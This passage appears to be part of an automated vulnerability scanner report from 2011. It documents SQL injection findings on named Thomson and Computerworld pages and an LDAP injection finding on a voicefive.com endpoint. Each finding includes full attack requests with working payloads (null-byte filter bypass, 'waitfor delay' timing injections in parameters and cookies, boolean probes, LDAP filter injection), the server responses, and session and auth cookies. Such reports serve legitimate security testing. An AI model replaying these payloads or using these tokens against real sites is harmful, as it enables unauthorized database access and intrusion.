IWICategory=IWICategory=21

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:38:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6551

<html>
<head>
<title>ERROR [42S22] [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'Lan_code'.</title>
<style>
   body {font-family:"Verdana";font-weig
...[SNIP]...

1.14. http://kbportal.thomson.com/index.aspx [cpc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /index.aspx?t=&article=&c=12&cid=21&cpc=mCUbki05i2q2gM801Slr08SHaX285EO45%00'&cat=&catURL= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; c_m2=1; c=undefined572000undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=49; s_cc=true; s_sq=; IWICategory=IWICategory=21

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:39:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7452

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'mCUbki05i2q2gM801Slr08SHaX285EO45'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'mCUbki05i2q2gM801Slr08SHaX285EO45'.</title>
...[SNIP]...

1.15. http://west.thomson.com/store/secure/ShoppingBasket.aspx [__EVENTARGUMENT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The __EVENTARGUMENT parameter appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __EVENTARGUMENT parameter. The application took 25172 milliseconds to respond to the request, compared with 4165 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Cache-Control: max-age=0
Origin: http://west.thomson.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=6A6829A10F5C92DE0CB1A119F9EE9EF6D463C8109880169103407982A3E46BDA6007A83A750A0D7480CFBF9A4B336F598A9593B27BDF383E9B083872778FAE7427116C427965D43F446DD889D881919105B7BABAC309443C501C47C990B1FFBAD3DF2CD8A712CBAA4D004A8450CB24CD7F020D95A63CF1472A257CCF2C17CDA8155DFA41CDCA27029587B185FA669700FFE3BA8D00AC5CE2CDAD3362741F94A7661A44E56659A38DDF1D36FA12CD885EEBC70ECAE55EEC287DB28317FD5EB03835B147E06AFF9BBA3021901B500B3920BF0567C85F21F5C94E3276344508AE28349FDD59; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE
Content-Length: 1139

__EVENTTARGET=ctl00%24placeHolderTopNavigation%24placeHolderContent%24btnProceedBottomsubmitButton&__EVENTARGUMENT=',0,0,0)waitfor%20delay'0%3a0%3a20'--&__VIEWSTATE=%2FwEPaA8FDzhjZGQyM2EzYjhjNDk4NxgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAU8Y3RsMDAkcGxhY2VIb2xkZXJUb3BOYXZpZ2F0aW9uJHBsYWNlSG9sZGVyQ29udGVudCRidG5Qcm9jZWVkBU1jdGwwMCRwbGFjZUhvbGRlc
...[SNIP]...

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 21:11:16 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26CartContents%3d22061301%253b%26PromCode%3d600582C43552%26PromType%3dinternal&CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 431

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C
...[SNIP]...

1.16. http://west.thomson.com/store/secure/ShoppingBasket.aspx [_msuuid_787f8z6077 cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The _msuuid_787f8z6077 cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the _msuuid_787f8z6077 cookie. The application took 52532 milliseconds to respond to the request, compared with 10937 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3',0)waitfor%20delay'0%3a0%3a20'--; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=A2B8589473CF8FC8B84582EDCCA18DA921C9607FD66A72923489A9D520F1A72DC25C5881F2C4299AFEC4F650329ED4D92FDB7810CCF374D8369FE4C447608C1AFF940455236DD8C534F6DDF5D9575CABE558EAEAC107A418E22F703D34308342D11D90AB828F7BFA1961EF59A3B04676FA38F27153203526720F64014AAF6FD2BDBA490CBE6FD194CC05A5B2612403A475A4ECE05807201D3CAEBB3AA82896D25B6F9D8910E1764008977756F0D348920ACDA8AA90BA295110ACD3D7783F9EE8463371CE85B2638990312C407C601E69F97C32BD90BA2EC5DFD202985E1A9741F53BA94F

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 21:03:06 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26CartContents%3d22061301%253b%26PromCode%3d600582C43552%26PromType%3dinternal&CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 431

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C
...[SNIP]...

1.17. http://west.thomson.com/store/secure/ShoppingBasket.aspx [c cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The c cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the c cookie. The application took 19936 milliseconds to respond to the request, compared with 2707 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load'waitfor%20delay'0%3a0%3a20'--; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:52:53 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fPromCode%3d571423&PromCode=571423
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 219

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fPromCode%3d571423&amp;PromCode=571423">here</a>.</h2
...[SNIP]...

1.18. http://west.thomson.com/store/secure/ShoppingBasket.aspx [s_id cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The s_id cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the s_id cookie. The application took 53423 milliseconds to respond to the request, compared with 10937 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn')waitfor%20delay'0%3a0%3a20'--; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=A2B8589473CF8FC8B84582EDCCA18DA921C9607FD66A72923489A9D520F1A72DC25C5881F2C4299AFEC4F650329ED4D92FDB7810CCF374D8369FE4C447608C1AFF940455236DD8C534F6DDF5D9575CABE558EAEAC107A418E22F703D34308342D11D90AB828F7BFA1961EF59A3B04676FA38F27153203526720F64014AAF6FD2BDBA490CBE6FD194CC05A5B2612403A475A4ECE05807201D3CAEBB3AA82896D25B6F9D8910E1764008977756F0D348920ACDA8AA90BA295110ACD3D7783F9EE8463371CE85B2638990312C407C601E69F97C32BD90BA2EC5DFD202985E1A9741F53BA94F

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:46:57 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26CartContents%3d22061301%253b%26PromCode%3d600582C43552%26PromType%3dinternal&CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 431

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C
...[SNIP]...

1.19. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.computerworld.com
Path:   /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.computerworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
piExres: Tue, 26 Apr 2011 22:10:48 GMT
nnCoection: close
Cheac-Control: private
ETag: "KXAOEEJGPLUXVQPYV"
Vary: Accept-Encoding
Cache-Control: public, max-age=545
Expires: Tue, 26 Apr 2011 22:10:04 GMT
Date: Tue, 26 Apr 2011 22:00:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/ParAccel.png" width="50" border="0" alt="Tackle the Most Challenging Analytic Queries" /></div>
<div class="text">
   <div class="label">WHITE PAPER</div>
       <div class="title"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="
http://resources.computerworld.com/show/200001013/00073050014183CTWIOIYR5H21H/?email=%%emailaddr%%">Tackle the Most Challenging Analytic Queries</a></div>
       <div class="summary">Tackle the most complex analytic challenges and glean insight from vast amounts of data. Learn how a columnar-based, massively parallel processing analytic database can provide high performance analytics against complex SQL workloads the most challenging analytic queries.</div>
<p style="margin:8px 0 0 0;"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="
http://resources.computerworld.com/show/200001013/00073050014183CTWIOIYR5H21H/?email=%%emailaddr%%">Read now.</a></p>
</div>
</div>
<div class="item">
   <div class="image"><img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/ibmcwfirehose.png" width="50" border="0" alt="Deploying Cost-Effective Data Centers" /></div>
<div class="text">
   <div class="label">WHITE PAPER</div>
       <div class="title"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="
http://solutioncenters.computerworld.com/ibm_government/registration/4364.html?source=00038860006213CTW922SDDEL5Z__ctw&SOURCE=00038860006213CTW922SDDEL5Z&emailAddress=%%emailaddr%%">Deploying Cost-Effective Data Centers</a></div>
       <div class="summary">Innovation matters - learn how to rapidly deploying cost-effective, energy-efficient data centers. Click here to find out more! </div>

...[SNIP]...

Request 2

GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.computerworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
piExres: Tue, 26 Apr 2011 22:11:02 GMT
nnCoection: close
Cheac-Control: private
ETag: "KXAOEEJGPLTMVQPYV"
Vary: Accept-Encoding
Cache-Control: public, max-age=581
Expires: Tue, 26 Apr 2011 22:10:46 GMT
Date: Tue, 26 Apr 2011 22:01:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/integrated-app-to-disk50x37.jpg" width="50" border="0" alt="Integrated Application-to-Disk Management" /></div>
<div class="text">
<div class="label">WEBCAST</div>
<div class="title"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="http://resources.computerworld.com/show/200000301/00137940016403CTWXO4OAP0I7V/?email=%%emailaddr%%">Integrated Application-to-Disk Management </a></div>
<div class="summary">Eliminate disparate tools and maximize return on your software and hardware investments.</div>
<p style="margin:8px 0 0 0;"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="http://resources.computerworld.com/show/200000301/00137940016403CTWXO4OAP0I7V/?email=%%emailaddr%%">Learn more.</a></p>
</div>
</div>
<div class="item">
<div class="image"><img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/ibmcwfirehose.png" width="50" border="0" alt="Deploying Cost-Effective Data Centers" /></div>
<div class="text">
<div class="label">WHITE PAPER</div>
<div class="title"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="http://solutioncenters.computerworld.com/ibm_government/registration/4364.html?source=00038860006213CTW922SDDEL5Z__ctw&SOURCE=00038860006213CTW922SDDEL5Z&emailAddress=%%emailaddr%%" class="title">Deploying Cost-Effective Data Centers</a></div>
<div class="summary">Innovation matters - learn how to rapidly deploying cost-effective, energy-efficient data centers. Click here to find out more! </div>
<p style="margin:8px 0 0
...[SNIP]...

2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 2fda59a1d239f5ba)(sn=* and 2fda59a1d239f5ba)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=2fda59a1d239f5ba)(sn=*&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2fda59a1d239f5ba&#41;&#40;sn=exp=1&initExp=Tue Apr 26 18:36:18 2011&recExp=Tue Apr 26 18:36:18 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842978; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=2fda59a1d239f5ba)!(sn=*&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:18 GMT
Content-Type: application/x-javascript
Connection: close
